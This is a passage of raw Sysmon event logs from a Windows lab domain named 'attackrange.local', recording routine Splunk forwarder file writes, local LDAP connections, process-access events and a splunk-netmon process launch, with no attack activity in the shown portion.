Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A905DB4A6D065855BF7338145DF96569,SHA256=9161FD9A31DC9AF16FD03993D7A9F98A3055878A0DC1DAC7351EE17AEC53BDF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:17.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=738A8BDA3810ED9C278107558BCA5383,SHA256=4F1B9C2DBDAF1E2DB99C4BB8666612737A9F4C6905A49EF40A7C217388981F1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.937{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51010-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 
354300x80000000000000001048183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.937{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51010-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:17.050{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C461C96D3C07ABD4B5B61D6BAF0229,SHA256=49DCF08DF9F373EE6EB37E0CE13918A3C649F70948246F6D5496794F547B7ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:18.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C5609F67871A075D76668EA38D10EA,SHA256=52A88B405CC0B7F180A371A50F460EAC83685E2D42A2948AF0E3C40731FD7343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:18.266{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:19.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E326A128EAA0234BDB95F3C81F571F81,SHA256=2422F33D05BC57068EAE2869D704E13EA05AE417C330B6A4EA0C0FA87C991826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:19.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0472CBD7E63C16AF3B6F7F890074D1,SHA256=7A5BB5F63B4425A37E9D9778067D50E635EAB76FD4FD0FF302C143AA297123F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:20.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA1B32AF28F02C5D3611E83CB8EB6CF,SHA256=CDCA32B628AEC5F0FB93AC3ADA6ECC34876604F8FB4977DF65E6A3AFE5C33BAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:19.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57251-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000807351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.456{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDF6F99FF515F7040A42DEB8F017710,SHA256=6A2E5179517D216315ED04943998A2DFC364E5041C2D8E980DD56062D109A497,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:12.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51011-false10.0.1.12-8000- 23542300x80000000000000001048190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:21.331{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=D9423C3129691C7A4B731F556C5D4A32,SHA256=95D4AF665AD4C9D191BB63890AB52B17A63BAC67CAFFF79E1847A492A9638110,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:21.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5855AA7BD4C6FC4308388F879E3E925C,SHA256=8F942B4B54884760FA33D4C2FB7F536DBD25A4D024D4623DF6110D4AF7CFE043,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.588{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:21.096{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1DBB8F71D0223131FB84778EDEFA0A,SHA256=8C5F88E1F2BF26287445EDD67893E6EC80F14596BB58CE56CA423345F568E7AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:22.045{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBFD472750504262E37069570D7271E,SHA256=1ADB18BB815BE2AD78C4EFFBD8F851A61060527D1B1F9BD3A596312C18DEC8E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:22.112{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B862D0180DA0E4682858610104B01E30,SHA256=3C68508A164C16FB923CA39B5715A4A932CB2B9884E47919C2CBBD073B3C9756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:23.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E17CD2596D6EBEAB6A9DBB2230D9B5D4,SHA256=283D3040C607C7749221ED4BEF343465CF6CA776F35E19279F37F05ED718A65B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19C70914B0B5B1DBA8BA55FCB38B5241,SHA256=F9852F5CA3811D1C62391EAFDF4A442B8C99086EE9BEED72E7363936A4D49D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:24.096{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC7E2EAEEA115D3332D2015E1D6B43C,SHA256=4F113E4AC46842E9451564657B162859599D3D3512D0FCB93BD4B8A77D02CD30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.956{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.940{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.940{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.941{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.440{0C1E0330-F47C-60EB-6C79-00000000D001}28401236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 